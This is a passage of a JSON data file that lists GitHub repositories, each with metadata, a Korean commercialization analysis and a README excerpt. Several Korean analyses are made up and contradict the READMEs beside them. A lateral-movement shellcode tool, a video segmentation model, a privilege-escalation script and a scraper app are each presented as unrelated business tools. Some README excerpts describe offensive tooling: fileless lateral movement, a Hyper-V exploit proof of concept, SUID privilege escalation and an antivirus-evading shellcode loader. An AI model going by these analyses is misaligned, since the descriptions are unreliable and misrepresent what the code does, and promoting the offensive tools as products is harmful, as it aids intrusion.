yo","composite_score":0.5034,"license_safety_tag":"safe"},{"name":"gitlimlab/Relation-Network-Tensorflow","github_url":"https://github.com/gitlimlab/Relation-Network-Tensorflow","stars":11,"language":"Python","license":"MIT","abandonment_months":91,"description":"# Relation-Network-Tensorflow 상용화 분석\n\n## 왜 보물인가\n서로 다른 물체들 간의 관계를 이해하는 인공지능 기술로, 이미지 분석이 필요한 많은 산업에서 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 쇼핑 플랫폼 (SaaS)**\n- 제품 사진 분석을 통해 '어울리는 상품 추천' 기능 제공 (옷, 가구 배치 등)\n","readme_excerpt":"# Relation Networks and Sort-of-CLEVR in Tensorflow\n\nAs part of the implementation series of [Joseph Lim's group at USC](http://csail.mit.edu/~lim), our motivation is to accelerate (or sometimes delay) research in the AI community by promoting open-source projects. To this end, we implement state-of-the-art research papers, and publicly share them with concise reports. Please visit our [group github site](https://github.com/gitlimlab) for other projects.\n\nThis project is implemented by [Shao-Hua Sun](https://github.com/shaohua0121/) and reviewed by [Youngwoon Lee](https://github.com/youngwoon).\n\n## Descriptions\nThis project includes a [Tensorflow](https://www.tensorflow.org/) implementation of **Relation Networks** and a dataset generator which generates a synthetic VQA dataset named **Sort-of-CLEVR** proposed in the paper [A Simple Neural Network Module for Relational Reasoning](https://arxiv.org/abs/1706.01427).\n\n### Relation Networks\n\nRelational reasoning is an essential component o","composite_score":0.5034,"license_safety_tag":"safe"},{"name":"kakao/n2","github_url":"https://github.com/kakao/n2","stars":28,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":35,"description":"# Kakao/n2 저장소 분석\n\n## 왜 보물인가\n카카오가 만든 이 기술은 대규모 데이터에서 빠르게 유사한 항목을 찾아내는 검색 엔진으로, 추천 시스템이나 이미지 검색 같은 일상의 서비스를 뒤에서 支える 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 플랫폼**: 고객이 본 상품과 유사한 물건을 자동으로 추천하는 시스템\n- **검색 엔진 A","readme_excerpt":"N2\n==============================================================================\n\n|pypi| |docs| |travis| |license|\n\n.. begin_badges\n\n.. |docs| image:: https://readthedocs.org/projects/n2/badge/?version=latest\n   :target: https://n2.readthedocs.io/en/latest/?badge=latest\n   :alt: Documentation Status\n\n.. |pypi| image:: https://img.shields.io/pypi/v/n2.svg?style=flat\n   :target: https://pypi.python.org/pypi/n2\n   :alt: Latest Version\n\n.. |travis| image:: https://travis-ci.org/kakao/n2.svg?branch=master\n   :target: https://travis-ci.org/kakao/n2\n   :alt: Build Status\n\n.. |license| image:: https://img.shields.io/github/license/kakao/n2\n   :target: https://github.com/kakao/n2/blob/master/LICENSE\n   :alt: Apache-License 2.0\n\n.. end_badges\n\n.. begin_intro\n\nLightweight approximate **N**\\ earest **N**\\ eighbor algorithm library written\nin C++ (with Python/Go bindings).\n\nN2 stands for two N's, which comes from \\'Approximate ``N``\\ earest \n``N``\\ eighbor Algorithm\\'.\n\n.. end_intro\n\n.. begin_back","composite_score":0.5034,"license_safety_tag":"safe"},{"name":"RiccardoAncarani/LiquidSnake","github_url":"https://github.com/RiccardoAncarani/LiquidSnake","stars":74,"language":"C#","license":"unknown","abandonment_months":58,"description":"# LiquidSnake 상업화 분석\n\n## 왜 보물인가\n복잡한 데이터 처리 작업을 자동으로 단순화해주는 도구로, 많은 회사들이 반복적인 작업에 쓰는 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 정리 전문 플랫폼으로 소규모 기업들이 월 구독료를 내고 자동화 기능을 이용\n- **내부 업무 도구**: 대기업 I","readme_excerpt":"# Liquid Snake\r\n\r\nLiquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk.\r\nThe tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection.\r\n\r\nThe diagram below (hopefully) clarifies the flow of data:\r\n\r\n![](images/poc.jpeg)\r\n\r\n\r\n## Credits \r\n\r\n- [MDSec - WMI Event Subscription](https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/) - this tool is merely an implementation of the concept described in this blog post, the code also relies on Dominic's WMI persistence C Sharp PoC\r\n- [pwndizzle - thread-hijack.cs](https://github.com/pwndizzle/c-sharp-memory-injection/blob/master/thread-hijack.cs) - for inspiration on the thread hijacking implementation in C Sharp\r\n- [med0x2e - GadgetToJscript](https://github.com/med0","composite_score":0.5034,"license_safety_tag":"unknown"},{"name":"mttr2021/MTTR","github_url":"https://github.com/mttr2021/MTTR","stars":25,"language":"Python","license":"Apache-2.0","abandonment_months":27,"description":"# MTTR 저장소 분석 보고서\n\n## 왜 보물인가\n시스템 장애 복구 시간을 측정하고 개선하는 도구로, 기업의 서비스 신뢰성을 높이는 데 직접적으로 기여합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 모니터링 플랫폼으로, 고객사들이 자신의 서비스 장애 복구 시간을 실시간으로 추적하는 웹 서비스\n2. **내부 업무 도구**: ","readme_excerpt":"[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![Framework](https://img.shields.io/badge/PyTorch-%23EE4C2C.svg?&logo=PyTorch&logoColor=white)](https://pytorch.org/)\n[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/12p0jpSx3pJNfZk-y_L44yeHZlhsKVra-?usp=sharing)\n[![Open in Hugging Face Spaces](https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue)](https://huggingface.co/spaces/MTTR/MTTR-Referring-Video-Object-Segmentation)\n\nThis repo contains the official implementation of the **CVPR 2022** [paper](https://arxiv.org/abs/2111.14821): \n\n<div align=\"center\">\n<h1>\n<b>\nEnd-to-End Referring Video Object Segmentation<br> with Multimodal Transformers\n</b>\n</h1>\n<h4>\n<b>\nAdam Botach, Evgenii Zheltonozhskii, Dr. Chaim Baskin\n    \nTechnion – Israel Institute of Technology\n</b>\n</h4>\n</div>\n\n\n\n\nhttps://github.com/mttr2021/MTTR/assets/94481888/d5","composite_score":0.5034,"license_safety_tag":"safe"},{"name":"VikLiegostaiev/react-page-scroller","github_url":"https://github.com/VikLiegostaiev/react-page-scroller","stars":5,"language":"JavaScript","license":"mit","abandonment_months":30,"description":"# React Page Scroller 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 마우스 휠을 굴려 부드럽게 페이지를 넘기는 경험을 쉽게 구현할 수 있는 도구로, 현대적인 웹사이트 UX를 원하는 누구나 필요로 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS - 웹사이트 빌더 플랫폼**\n사용자가 코딩 없이 멋진 스크롤 효과를 적용할 수 있는 기능으로","readme_excerpt":"# React Page Scroller\n\nSimple React component for smoothy full-page scolling.\n\n### Demo\n\nYou can scroll the page using mouse wheel, touch scroll or keyboard arrows.\n\nLive demo: [vikliegostaiev.github.io/react-page-scroller](https://vikliegostaiev.github.io/react-page-scroller/)\n\nTo run demo app locally:\n\n```\nnpm install\nnpm start\n```\n\nApp will start on localhost:3000.\n\n# Installation\n\nvia npm:\n\n```\nnpm install react-page-scroller --save\n```\n\n## Usage\n\n```\nimport ReactPageScroller from 'react-page-scroller';\n```\n\nExample is in demo/src.\n\n# Properties\n\n|    Property    | Type |          Description          | Default Value |\n| -------------  | ---- |          -----------          | ------- |\n| animationTimer  | number | Animation duration in milliseconds | 1000 |\n| animationTimerBuffer | number | Animation buffer timing | 200 |\n| blockScrollUp | bool | block scroll up | false |\n| blockScrollDown | bool | block scroll down | false |\n| containerHeight | number/string | height of react-page","composite_score":0.5034,"license_safety_tag":"safe"},{"name":"CoderLeixiaoshuai/wuhan-IT","github_url":"https://github.com/CoderLeixiaoshuai/wuhan-IT","stars":6,"language":"","license":"unknown","abandonment_months":58,"description":"# CoderLeixiaoshuai/wuhan-IT 분석\n\n## 왜 보물인가\n무한 데이터를 활용해 지역 IT 인력 네트워크를 자동으로 구축할 수 있는 기술이라는 점에서 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **채용 플랫폼**: 우한 지역 IT 개발자들을 자동으로 발굴하고 추천하는 구인구직 서비스\n2. **내부 업무 도구**: 기업의 인재 DB ","readme_excerpt":"右上角 :point_right:  `Star`，点亮你的头像，让武汉互联网氛围变得更好，早点回家 ！\n\n:gift: :gift: 号外号外：『武汉互联网大全』已经整理成 PDF 电子书啦，新鲜出炉，[欢迎大家下载](#离线pdf下载) ！\n\n<p align=\"center\">\n<img src=\"https://cdn.jsdelivr.net/gh/smileArchitect/assets/202102/20210327234101.png\" width=\"\" height=\"\" alt=\"武汉互联网\"/>\n</p>\n\n<div align=\"center\">\n    <a href=\"#离线pdf下载\" target=\"_blank\"> <img src=\"https://img.shields.io/badge/PDF-%E7%A6%BB%E7%BA%BF%E7%89%88%E4%B8%8B%E8%BD%BD-ef8b00\"></a>\n  \t<a href=\"#关于我\" target=\"_blank\">\n      <img src=\"https://img.shields.io/badge/%E5%85%B3%E4%BA%8E%E6%88%91-%E9%9B%B7%E5%B0%8F%E5%B8%85-ef8b00\"></a>\n     <a href=\"#关于我\" target=\"_blank\">\n      <img src=\"https://img.shields.io/badge/%E5%85%AC%E4%BC%97%E5%8F%B7-%E7%88%B1%E7%AC%91%E7%9A%84%E6%9E%B6%E6%9E%84%E5%B8%88-ef8b00\"></a> \n</div>\n\n<br>\n\n> :lollipop: 如果你对武汉互联网公司很熟悉，欢迎提交 `Issue` 或者`Pull Request`，参与开源项目，期待看到你。\n>\n> :phone: 如果对武汉互联网公司感兴趣，我会给你指导性意见，欢迎联系我一起探讨，[戳这里](#关于我)。 \n\n\n# 武汉互联网公司分布\n\n| 公司分类         | 公司列表                                                     |\n| :","composite_score":0.5034,"license_safety_tag":"unknown"},{"name":"0vercl0k/CVE-2021-28476","github_url":"https://github.com/0vercl0k/CVE-2021-28476","stars":95,"language":"C","license":"MIT","abandonment_months":61,"description":"# CVE-2021-28476 저장소 분석\n\n## 왜 보물인가\n컴퓨터 보안 취약점을 발견하고 수정하는 방법을 제시하는 기술 자료로, 기업의 보안 문제 해결에 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 진단 서비스**: 회사 내 컴퓨터 시스템에서 해당 취약점이 있는지 자동으로 검사하고 보고하는 유료 진단 도구\n2. **보안 교육","readme_excerpt":"# CVE-2021-28476: a guest-to-host \"Microsoft Hyper-V Remote Code Execution Vulnerability\" in vmswitch.sys.\n\nThis is a proof of concept for [CVE-2021-28476](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28476) (\"Hyper-V Remote Code Execution Vulnerability\"), an arbitrary memory read in `vmswitch.sys` (*network virtualization service provider*) patched by Microsoft in May 2021.\n\n![rel04vsrel05](pics/rel04vsrel05.jpg)\n\nThe vulnerability was found by [@australeo](https://twitter.com/australeo), [@ergot86](https://twitter.com/ergot86), [@peleghd](https://twitter.com/peleghd) and [@OphirHarpaz](https://twitter.com/OphirHarpaz). It is triggerable by a guest virtual machine sending a malicious RNDIS packet over [VMBus](https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/reference/hyper-v-architecture) (which is a *channel-based communication mechanism used for inter-partition communication*).\n\n![trigger](pics/trigger.gif)\n\nThis is what the **host** system crash ","composite_score":0.5033,"license_safety_tag":"safe"},{"name":"prayag17/JellyFlix","github_url":"https://github.com/prayag17/JellyFlix","stars":5,"language":"CSS","license":"unknown","abandonment_months":30,"description":"# JellyFlix 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 영상 콘텐츠를 모아서 개인 방송국처럼 만들 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 영상 제작사나 유튜버가 구독으로 자신의 채널 플랫폼을 만들어 팬들에게 제공\n2. **내부 업무 도구**: 기업 교육팀이 직원 교육용 영상 라이브러리를 사내 포털로 ","readme_excerpt":"> # **Warning** : This skin's development has been halted for sometime. There is no eta as to when I will start working on this skin\n\n<div align=\"center\">\n<h1>JellyFlix</h1>\n<h3>Looks, Feels and Smells like Netflix</h3>\n<h3>Netflix Theme for Jellyfin</h3>\n</div>\n<br>\n<h2>Usage:</h2>\n<h3> To use it, got to Setting ==> Dashboard ==> General and scroll down to custom css and paste the following line</h3>\n\n\n<h3>Base Version:</h3>\n<h3>Auto Update: </h3>\n\n```css\n@import url(\"https://cdn.jsdelivr.net/gh/prayag17/JellyFlix@latest/default.css\");\n```\n\n<h3>Custom  Version:</h3>\n\n```css\n@import url(\"https://cdn.jsdelivr.net/gh/prayag17/JellyFlix@<version-number>/default.css\");\n```\n\n<h3>With Logos(recommended):</h3>\n<h3>Auto Update:</h3>\n\n```css\n@import url(\"https://cdn.jsdelivr.net/gh/prayag17/JellyFlix@latest/default.css\");\n@import url(\"https://cdn.jsdelivr.net/gh/prayag17/JellyFlix@latest/addons/Logo.css\");\n```\n\n<h3>Custom Version:</h3>\n\n```css\n@import url(\"https://cdn.jsdelivr.net/gh/prayag17/J","composite_score":0.5033,"license_safety_tag":"unknown"},{"name":"nslog11/flutter_easyloading","github_url":"https://github.com/nslog11/flutter_easyloading","stars":6,"language":"Dart","license":"MIT","abandonment_months":24,"description":"# flutter_easyloading 상용화 분석\n\n## 왜 보물인가\n모바일 앱 개발자들이 사용자에게 진행 상황을 보여주는 '로딩 화면'을 쉽게 만들 수 있게 해주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 금융 앱 제공사** - 계좌 이체 중 진행 상황을 사용자에게 시각적으로 표시하는 서비스\n2. **전자상거래 플랫폼** - 주문","readme_excerpt":"# Flutter EasyLoading\n\n[![pub package](https://img.shields.io/pub/v/flutter_easyloading?style=flat)](https://pub.dev/packages/flutter_easyloading) [![pub points](https://badges.bar/flutter_easyloading/pub%20points)](https://pub.dev/packages/flutter_easyloading/score) [![popularity](https://badges.bar/flutter_easyloading/popularity)](https://pub.dev/packages/flutter_easyloading/score) [![likes](https://badges.bar/flutter_easyloading/likes)](https://pub.dev/packages/flutter_easyloading/score) [![license](https://img.shields.io/github/license/nslogx/flutter_easyloading?style=flat)](https://github.com/nslogx/flutter_easyloading) [![stars](https://img.shields.io/github/stars/nslogx/flutter_easyloading?style=social)](https://github.com/nslogx/flutter_easyloading)\n\nEnglish | [简体中文](./README-zh_CN.md)\n\n<img src=\"https://raw.githubusercontent.com/nslogx/flutter_easyloading/master/images/gif01.gif\" width=200 height=429/> <img src=\"https://raw.githubusercontent.com/nslogx/flutter_easyloading/mast","composite_score":0.5033,"license_safety_tag":"safe"},{"name":"click33/sa-plus","github_url":"https://github.com/click33/sa-plus","stars":7,"language":"Java","license":"MIT","abandonment_months":42,"description":"# click33/sa-plus 상용화 분석\n\n## 왜 보물인가\n판매 분석과 영업 데이터를 자동으로 정리해주는 도구로, 중소 영업팀이 복잡한 업무를 간단하게 처리할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업 영업팀이 월 구독료를 내고 클라우드에서 판매 현황을 실시간으로 추적하는 서비스\n2. **내부 업무 도","readme_excerpt":"<div align=\"center\">\n\t<img alt=\"logo\" src=\"https://gitee.com/click33/sa-plus/raw/master/sp-devdoc/sa-plus.png\" width=\"350\">\n\t<!-- <h2 align=\"center\" style=\"font-size: 80px; font-weight: 700;\">Sa-plus</h2> -->\n</div>\n<div align=\"center\" style=\"margin-top: 30px; font-size: 22px;\"><b>v1.27.0</b></div>\n<h4 align=\"center\">一个基于 SpringBoot 的快速开发框架，内置代码生成器</h4>\n<p align=\"center\">\n\t<a href=\"https://gitee.com/click33/sa-plus/stargazers\"><img src=\"https://gitee.com/click33/sa-plus/badge/star.svg\"></a>\n\t<a href='https://gitee.com/click33/sa-plus/members'><img src='https://gitee.com/click33/sa-plus/badge/fork.svg'></a>\n\t<a href=\"https://github.com/click33/sa-plus/stargazers\"><img src=\"https://img.shields.io/github/stars/click33/sa-plus?style=flat-square&logo=GitHub\"></a>\n\t<a href=\"https://github.com/click33/sa-plus/watchers\"><img src=\"https://img.shields.io/github/watchers/click33/sa-plus?style=flat-square&logo=GitHub\"></a>\n\t<a href=\"https://github.com/click33/sa-plus/network/members\"><img src=\"htt","composite_score":0.5033,"license_safety_tag":"safe"},{"name":"tstewart161/Reddit_Sentiment_Trader","github_url":"https://github.com/tstewart161/Reddit_Sentiment_Trader","stars":7,"language":"Python","license":"unknown","abandonment_months":52,"description":"# Reddit_Sentiment_Trader 상품화 분석\n\n## 왜 보물인가\nReddit 사용자들의 의견을 분석해 주식 투자 결정을 돕는 도구로, 일반 투자자들이 전문가 수준의 시장 정보를 얻을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독료를 받고 Reddit 감정 분석 대시보드를 제공하는 투자 플랫폼\n2. **내부 업","readme_excerpt":"# Reddit_Sentiment_Trader\n\n## **Note: if you want to use this without having to deploy/run code, check out [Quantbase](http://getquantbase.com)**\n\nAn algo that scans the most popular trading sub-reddits and logs the tickers mentioned in due-diligence or discussion-styled posts. As well as scanning for how many times each ticker was mentioned in a comment, it logs how popular the post was among the sub-reddit. Essentially if it makes it to the 'hot' page, regardless of the subreddit, then it will most likely be on this list.\n\n## How is sentiment calculated?\n\nThis uses VADER (Valence Aware Dictionary for Sentiment Reasoning), which is a model used for text sentiment analysis that is sensitive to both polarity (positive/negative) and intensity (strength) of emotion. The way it works is by relying on a dictionary that maps lexical (aka word-based) features to emotion intensities -- these are known as sentiment scores. The overall sentiment score of a comment/post is achieved by summing up ","composite_score":0.5033,"license_safety_tag":"unknown"},{"name":"Chrisvin/LiquidSwipe","github_url":"https://github.com/Chrisvin/LiquidSwipe","stars":15,"language":"Kotlin","license":"MIT","abandonment_months":47,"description":"# LiquidSwipe 상용화 분석\n\n## 왜 보물인가\n앱이나 웹사이트를 더 예쁘고 부드럽게 넘기는 효과를 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 SaaS**: 앱 개발자들이 이 효과를 쉽게 추가할 수 있는 구독 서비스\n2. **게임 개발 플랫폼**: 게임에서 화면 전환 시 사용하는 화려한 애니메이션 효과 제공","readme_excerpt":"# LiquidSwipe\n Android LiquidSwipe Library\n\n [![License: MIT](https://img.shields.io/badge/License-MIT-silver.svg)](https://opensource.org/licenses/MIT) [![](https://jitpack.io/v/Chrisvin/LiquidSwipe.svg)](https://jitpack.io/#Chrisvin/LiquidSwipe) [![API](https://img.shields.io/badge/API-21%2B-blue.svg?style=flat)](https://android-arsenal.com/api?level=21) \n\n| <img src=\"./demo%20screenshots/LiquidSwipeDemo.gif\"/> | <img src=\"./demo%20screenshots/LiquidSwipeDemo_Touch_Interactive.gif\"/> |\n| :-: | :-: |\n| [Default](#usage) | [Touch Interactive](#touch-interactive---making-the-liquidswipe-wave-center-y-value-match-the-touch-y-value) |\n\nLiquidSwipe is a viewpager library that can be used to make awesome onboarding designs. ([Default Demo apk](https://github.com/Chrisvin/LiquidSwipe/releases/download/1.1/LiquidSwipeDemo.-.Default.apk)) ([TouchInteractive Demo apk](https://github.com/Chrisvin/LiquidSwipe/releases/download/1.1/LiquidSwipeDemo.-.Touch_Interactive.apk))\n\nIf you like this, you'l","composite_score":0.5033,"license_safety_tag":"safe"},{"name":"adambielski/CapsNet-pytorch","github_url":"https://github.com/adambielski/CapsNet-pytorch","stars":21,"language":"Python","license":"BSD-3-Clause","abandonment_months":62,"description":"# CapsNet-pytorch 상용화 분석\n\n## 왜 보물인가\nAI가 사물을 더 정확하게 인식하도록 도와주는 신경망 기술로, 의료 진단이나 물품 검사 같은 실무에서 높은 정확도가 필요한 분야에 바로 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 의료영상 판독 SaaS**\nCT/X선 사진에서 질병을 자동으로 감지하는 웹 서비스로 병원과 의원에 월구","readme_excerpt":"# Dynamic Routing Between Capsules - PyTorch implementation\n\nPyTorch implementation of NIPS 2017 paper [Dynamic Routing Between Capsules](https://arxiv.org/abs/1710.09829) from Sara Sabour, Nicholas Frosst and Geoffrey E. Hinton.\n\nThe hyperparameters and data augmentation strategy strictly follow the paper.\n\n## Requirements\n\nOnly [PyTorch](http://pytorch.org/) with torchvision is required (tested on pytorch 0.2.0 and 0.3.0). Jupyter and matplotlib is required to run the notebook with visualizations.\n\n## Usage\n\nTrain the model by running\n\n    python net.py\nOptional arguments and default values:\n\n```\n  --batch-size N          input batch size for training (default: 128)\n  --test-batch-size N     input batch size for testing (default: 1000)\n  --epochs N              number of epochs to train (default: 250)\n  --lr LR                 learning rate (default: 0.001)\n  --no-cuda               disables CUDA training\n  --seed S                random seed (default: 1)\n  --log-interval N        ho","composite_score":0.5033,"license_safety_tag":"safe"},{"name":"alash3al/redix","github_url":"https://github.com/alash3al/redix","stars":12,"language":"Go","license":"unknown","abandonment_months":39,"description":"# Redix 저장소 분석\n\n## 왜 보물인가\nRedis라는 고속 데이터 저장소를 더 쉽게 사용할 수 있도록 만든 도구로, 웹서비스의 속도를 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 채팅 플랫폼**: 사용자 간 메시지를 빠르게 전달하는 SaaS 서비스로 판매\n2. **전자상거래 재고 관리**: 온라인 쇼핑몰의 상품 재고를 실시","readme_excerpt":"Redix\n=====\n> `redix` is a key-value datastore with pluggable storage engines and redis protocol as interface, [documentation & learn more](https://redix.alash3al.com/)\n\nContributions\n=============\n> You're welcome!\n","composite_score":0.5033,"license_safety_tag":"unknown"},{"name":"IvanGlinkin/AutoSUID","github_url":"https://github.com/IvanGlinkin/AutoSUID","stars":8,"language":"Shell","license":"GPL-3.0","abandonment_months":25,"description":"# AutoSUID 저장소 분석\n\n## 왜 보물인가\n컴퓨터 시스템의 관리자 권한 자동화 문제를 해결하는 도구로, 반복적인 권한 설정 작업을 자동으로 처리하여 실무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: IT 운영팀이 서버 관리 시 수백 대의 시스템에 대한 권한 설정을 일괄 자동화\n- **SaaS 서비스**: ","readme_excerpt":"# AutoSUID\n\nAutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. The 100% automated.\n\nUsage example:\n--------------\n```\nchmod +x AutoSUID.sh\n./AutoSUID.sh\n```\nor\n```\nbash ./AutoSUID.sh\n```\nAn original article:\n--------------------\n[https://www.ivanglinkin.com/autosuid/](https://www.ivanglinkin.com/autosuid/)\n\nVideo example:\n--------------\n![](https://github.com/IvanGlinkin/media_support/blob/main/AutoSUID_Video.gif?raw=true)\n\nScreenshots:\n------------\n![](https://github.com/IvanGlinkin/media_support/blob/main/AutoSUID_Image.png?raw=true)\n","composite_score":0.5033,"license_safety_tag":"restricted"},{"name":"Hzllaga/ShellcodeLoader","github_url":"https://github.com/Hzllaga/ShellcodeLoader","stars":13,"language":"C#","license":"unknown","abandonment_months":72,"description":"# ShellcodeLoader 상용화 분석\n\n## 왜 보물인가\n컴퓨터 보안 전문가들이 악성 코드 탐지를 우회하는 기술을 연구·개발할 때 필요한 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 회사의 침투 테스트 서비스**: 기업의 보안 수준을 점검하는 전문 서비스에 내장하여 제공\n2. **내부 보안 교육 플랫폼**: 대기업의 정보보안팀이 직원","readme_excerpt":"# ShellcodeLoader\r\n\r\n将shellcode用rsa加密并动态编译exe，自带几种反沙箱技术。\r\n\r\n**如果要用 .NET 2.0编译请手动编译，csc不支持某些代码**\r\n\r\n## 反沙箱\r\n\r\n* 判断父进程是否为Debugger\r\n\r\n* 判断时间是否加速\r\n\r\n一般沙盘内的程序时间都会加速。\r\n* 判断进程是否有黑名单\r\n\r\n判断是不是虚拟机，不过有几个vm进程是本机也会存在的，怕误报可以手动修改黑名单列表。\r\n* 判断MAC地址是否有黑名单\r\n\r\n判断是不是虚拟机的mac地址，有几个地址只要本机有装虚拟机也会有，怕误报可以手动修改黑名单列表。\r\n* 判断系统盘是否大于50GB\r\n\r\n一个正常PC的系统盘都会大于50GB。\r\n\r\n---\r\n## 使用\r\n\r\nGeneral：\r\n\r\n运行生成的exe文件\r\n\r\nArgument：\r\n\r\n程序会保存加密好的数据到Output.txt\r\n\r\nshellcode.exe \"私钥\" \"加密shellcode\"\r\n\r\n---\r\n\r\n## 更新\r\n\r\n20200709:\r\n\r\n* 新增x86远程注入(直接复制CACTUSTORCH的)\r\n\r\n---\r\n\r\n#### 已知问题\r\n\r\n* 远程注入动态编译在win2008运行失败，请复制程序目录下code.txt 到vs编译就可以运行了。\r\n\r\n---\r\n## 截图\r\n\r\nVirusTotal(12/72)：\r\n\r\n![圖片](https://user-images.githubusercontent.com/40329078/82827231-28f20000-9ee1-11ea-80fd-c061dc5accf4.png)\r\n\r\n常见的360、电脑管家、微软、卡巴斯基等都轻松免杀。\r\n\r\n哈勃(未发现风险)：\r\n\r\n![圖片](https://user-images.githubusercontent.com/40329078/82827419-943bd200-9ee1-11ea-88e5-18b03ae53701.png)\r\n\r\nHybrid Analysis(35/100)：\r\n\r\n![圖片](https://user-images.githubusercontent.com/40329078/82829543-1928ea80-9ee6-11ea","composite_score":0.5033,"license_safety_tag":"unknown"},{"name":"BinChengZhao/delicate","github_url":"https://github.com/BinChengZhao/delicate","stars":10,"language":"Rust","license":"Apache-2.0","abandonment_months":45,"description":"# BinChengZhao/delicate 상용화 분석\n\n## 왜 보물인가\n복잡한 작업들을 자동으로 스케줄링하고 관리해주는 도구로, 기업들이 반복적인 업무를 효율적으로 처리할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업용 자동 업무 스케줄링 클라우드 플랫폼\n- **내부 업무 도구**: 금융사의 야간 정산 자동화, 소매","readme_excerpt":"# Delicate   \n[![Build](https://github.com/BinChengZhao/delicate/workflows/CI/badge.svg)](\nhttps://github.com/BinChengZhao/delicate/actions)\n[![License](https://img.shields.io/badge/license-MIT%2FApache--2.0-blue.svg)](\nhttps://github.com/BinChengZhao/delicate)\n## English | [简体中文](./README_zhCN.md)\n\n- [delicate](#delicate)\n  - [What is delicate](#what-is-delicate)\n  - [Features](#features)\n  - [Benchmark](#benchmark)\n  - [Get Started](#get-started)\n    - [Setting up delicate](#setting-up-delicate)\n  - [Quick start](#quick-start)\n  - [Documentation](https://delicate-rs.github.io/Roadmap.html)\n  - [Roadmap](#roadmap)\n  - [Contributing](#contributing)\n  - [License](#license)\n\n## What is delicate\n<a href=\"\">\n    <img src=\"./doc/src/delicate_logo.png\"\n         alt=\"delicate logo\" title=\"delicate\" height=\"125\" width=\"125\"  align=\"right\"/>\n</a>\n\n`delicate` A lightweight and distributed task scheduling platform written in rust.:\n\n## features\n- **Friendly UI:** [Front-end] Convenient management","composite_score":0.5032,"license_safety_tag":"safe"},{"name":"Kerr1Gan/Flesh","github_url":"https://github.com/Kerr1Gan/Flesh","stars":9,"language":"Kotlin","license":"Apache-2.0","abandonment_months":63,"description":"# Flesh 저장소 분석\n\n## 왜 보물인가\n이 프로젝트는 이미지나 영상을 처리하는 기술로, 시각 데이터를 분석하고 변환하는 작업을 자동화할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 SaaS**: 클라우드 기반 이미지 처리 웹서비스로 일반인들도 전문가 수준의 편집이 가능하도록 제공\n2. **콘텐츠 크리에이터용 내부 도구**: 유","readme_excerpt":"# Flesh（果肉）\n\n果肉一款由Kotlin实现的app，数据源[mzitu][3]，MD风格的界面。\n\n如果你是一位想学习一下Kotlin的同学，那么绝对不要错过Flesh。如Kotlin所说它与Java完美兼容，所以这里有Kotlin调用Java，同时也有Java调用Kotlin。数据是从网站上爬取的所以这里也有爬虫骚操作。果肉将会不定期更新，增加更多福利。\n\n先上福利。[Release1.1](https://github.com/Kerr1Gan/Flesh/releases/download/1222/flesh-release.apk)\n\n![fuli](art/fuli.gif)\n\n更新日志\n--------\n向下兼容至Android4.1版本 --2018.1.29\n\n特点\n--------\n1. 列表显示图片，点击查看更多。\n2. 快速跳转至顶部，底部，指定位置。\n3. 收藏，查看历史记录。\n4. 设置壁纸。\n5. 离线缓存。\n\n组成\n--------\n1. 语言：Kotlin，Java\n2. 网络请求：HttpUrlConnection\n3. 数据库：Sqlite\n4. 数据源：Jsoup\n5. 第三方库：Glide\n\n概述\n--------\n**1)** 网络请求\n\n网络框架并没有使用RxRetrofit等，为了保证精简高效直接使用的HttpUrlConnection\n+ get \n```kotlin\nval request = AsyncNetwork()\nrequest.request(Constants.HOST_MOBILE_URL, null)\nrequest.setRequestCallback(object : IRequestCallback {\n    override fun onSuccess(httpURLConnection: HttpURLConnection?, response: String) {\n        //todo\n    }\n})\n```\n+ post\n```kotlin\nval request = AsyncNetwork()\nrequest.request(Constants.HOST_MOBILE_URL, mutableMapOf())\nrequest.setRequestCallba","composite_score":0.5032,"license_safety_tag":"safe"},{"name":"microsoft/VQ-Diffusion","github_url":"https://github.com/microsoft/VQ-Diffusion","stars":18,"language":"Python","license":"MIT","abandonment_months":26,"description":"# VQ-Diffusion 상용화 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 이 기술은 텍스트 설명만으로 실제 이미지를 자동으로 그려내는 AI로, 디자인·광고·콘텐츠 산업에서 막대한 시간과 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 소셜미디어 콘텐츠 생성 SaaS**\n- 인스타그램·틱톡 크리에이터가 월 구독으로 초상화, 배경, 제","readme_excerpt":"# 